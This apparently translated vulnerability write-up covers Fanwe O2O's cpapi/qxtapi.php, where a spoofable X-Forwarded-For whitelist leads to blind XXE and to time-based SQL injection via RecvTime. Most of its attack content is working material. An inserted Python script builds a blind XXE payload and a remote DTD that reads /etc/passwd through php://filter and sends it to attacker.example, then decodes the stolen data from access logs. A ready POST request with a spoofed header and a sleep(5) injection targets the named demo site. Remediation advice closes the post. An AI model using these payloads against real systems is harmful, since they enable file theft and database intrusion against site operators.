Fanwe O2O commercial system SQL injection vulnerability + XXE entity Injection
Fanwe O2O, demo site: http://o2odemo.fanwe.net//cpapi/qxtapi.php. The entry point of cpapi/qxtapi.php reads:

    define("FILE_PATH", "/cpapi");
    require_once '../system/system_init.php';
    $ip  = CLIENT_IP;
    $xml = file_get_contents('php://input');
    if ($ip != '221.179.180.156' || $xml == "") {
        header("Content-Type:text/html; charset=utf-8");
        echo "非法访问"; // "Illegal access"
        exit;
    }
    $xml     = str_replace(array("/r/n", "/r", "/n"), "", $xml);
    $xml_arr = simplexml_load_string($xml);
In the code above, the IP check compares CLIENT_IP, which can be spoofed with an X-Forwarded-For header, and the raw POST body is then handed straight to simplexml_load_string(), so external entities declared in the body are resolved: XXE entity injection. Nothing from the parsed document is echoed back later, so this is a blind XXE and the data has to leave the server out of band. Against the official demo my request produced no callback; there may be several reasons (no outbound internet access from the server, or entity resolution restricted at the libxml layer). Locally it worked: the target file was read and its contents arrived base64-encoded in the web logs of a server I control.
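To make the out-of-band step concrete, here is an added example (not code from the write-up or from Fanwe) of the two documents the attacker needs and of decoding what comes back in the attacker's access log. The host attacker.example, the file name evil.dtd, the query parameter d and the sample log lines are constructed for illustration; reading the file through php://filter as base64 is the usual way to exfiltrate by blind XXE from PHP and is assumed here to be what the author did.

```python
"""Blind (out-of-band) XXE against cpapi/qxtapi.php: the two documents the attacker
needs, and the decoding of what comes back in the attacker's web logs.

Added example, not code from the write-up or from Fanwe. ATTACKER, the DTD file name,
the query parameter name and SAMPLE_LOG are constructed for illustration; the
php://filter base64 trick is the usual way to exfiltrate a file by blind XXE from PHP
and is assumed here to be what the author did.
"""
import base64
import re
from urllib.parse import unquote

ATTACKER = "http://attacker.example"   # assumed: a host whose access log the attacker reads


def build_xxe_document() -> str:
    """POST body for qxtapi.php. It only references the attacker's DTD; the DTD does
    the reading, so nothing in this body depends on file paths. Keep the sequences
    that qxtapi.php str_replace()s out of the input (shown above as "/r/n", "/r",
    "/n") out of this body, or the DTD URL gets mangled before parsing."""
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE Body [<!ENTITY % remote SYSTEM "{ATTACKER}/evil.dtd"> %remote;]>'
        "<Body><Message><SrcMobile>1</SrcMobile><Content>1</Content>"
        "<RecvTime>1</RecvTime></Message></Body>"
    )


def build_remote_dtd(target_file: str = "/etc/passwd") -> str:
    """DTD served as ATTACKER/evil.dtd. %file reads the target through php://filter as
    base64, so the content has no newlines or quotes that would break a URL; %int
    declares %send indirectly (&#37; is '%') so that %file; is expanded into the URL,
    and %send; makes libxml fetch that URL, carrying the data to the attacker."""
    return (
        f'<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource={target_file}">\n'
        f'<!ENTITY % int "<!ENTITY &#37; send SYSTEM \'{ATTACKER}/?d=%file;\'>">\n'
        "%int;\n"
        "%send;\n"
    )


# One callback per exfiltrated file: GET /?d=<base64> in combined-log format.
HIT = re.compile(r'"GET /\?d=([A-Za-z0-9+/=%]+) HTTP/[\d.]+"')


def decode_exfil(access_log: str) -> list:
    """Find every ?d=<base64> request in the attacker's access log and decode it.
    Percent-decode first in case '+', '/' or '=' were URL-encoded on the way."""
    files = []
    for m in HIT.finditer(access_log):
        blob = unquote(m.group(1))
        files.append(base64.b64decode(blob).decode("utf-8", "replace"))
    return files


# Constructed sample: the two hits that parsing build_xxe_document() leaves in the
# attacker's log (the DTD fetch, then the callback carrying /etc/passwd as base64).
PASSWD = "root:x:0:0:root:/root:/bin/bash\n"
SAMPLE_LOG = (
    '203.0.113.7 - - [10/Oct/2015:12:00:01 +0800] "GET /evil.dtd HTTP/1.0" 200 231 "-" "-"\n'
    '203.0.113.7 - - [10/Oct/2015:12:00:01 +0800] "GET /?d='
    + base64.b64encode(PASSWD.encode()).decode()
    + ' HTTP/1.0" 200 0 "-" "-"\n'
)

if __name__ == "__main__":
    print(build_xxe_document())
    print(build_remote_dtd())
    print(decode_exfil(SAMPLE_LOG))
```

The DTD fetch appearing in the log without a following ?d= callback is the signature of the case the author hit on the demo: the parser reached out, but the second request (the one carrying the file) was blocked or never attempted.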
That is not the main point, though. The SQL injection further down in the same file is:

    $xml_arr   = simplexml_load_string($xml);
    $SrcMobile = $xml_arr->Body->Message->SrcMobile;
    $Content   = $xml_arr->Body->Message->Content;
    $RecvTime  = $xml_arr->Body->Message->RecvTime;
    $arr    = explode("-", $Content);
    $prefix = $arr[0];
    if ($prefix != 'U' && $prefix != 'V') {
        if (log_coupon("", "SMS content :" . $Content, $RecvTime) && $SrcMobile) {
            $msg_data['dest']        = $SrcMobile;
            $msg_data['send_type']   = 0;
            $msg_data['content']     = "SMS format error";
            $msg_data['send_time']   = 0;
            $msg_data['is_send']     = 0;
            $msg_data['create_time'] = NOW_TIME;
            $msg_data['user_id']     = 0;
            $msg_data['is_html']     = 0;
            $GLOBALS['db']->autoExecute(DB_PREFIX . "deal_msg_list", $msg_data); // insert
            echo "OK";
            exit;
        }
    }
The values read from the XML are passed to log_coupon(). Following that function:

    function log_coupon($coupon_sn, $msg, $query_id = '')
    {
        $data = array();
        $data['coupon_sn']   = $coupon_sn;
        $data['msg']         = $msg;
        $data['query_id']    = $query_id;
        $data['create_time'] = NOW_TIME;
        // $query_id is concatenated into the query without any escaping
        if ($GLOBALS['db']->getOne("select count(*) from " . DB_PREFIX . "coupon_log where query_id = '" . $query_id . "'") == 0) {
            $GLOBALS['db']->autoExecute(DB_PREFIX . "coupon_log", $data); // insert
            return true;
        } else {
            return false;
        }
    }
So query_id, which is the RecvTime value taken from the XML, is concatenated unescaped into the SQL statement. On the demo site this can be shown with a time-based (delay) injection. POST the following request (the XML tags of the body were lost when this page was copied, as the Content-Length of 147 shows; the injected value ending in '|sleep(5)# is the RecvTime element):

    POST /cpapi/qxtapi.php HTTP/1.1
    Host: o2odemo.fanwe.net
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 147
    X-FORWARDED-FOR: 221.179.180.156

    133222211111231230'|sleep(5)#
The response only comes back after a delay of 5 seconds, which confirms the time-based blind injection. From here a script can extract the database user name one character at a time; see the test code.
Solution:
Filter and escape RecvTime (and the other XML fields) before they reach log_coupon(), or better, bind query_id as a parameter instead of concatenating it into the SQL string. Disable external entity loading before calling simplexml_load_string() (libxml_disable_entity_loader(true) on the PHP versions in use at the time). Do not build CLIENT_IP from the X-Forwarded-For header when it is used for an IP whitelist; use the socket address.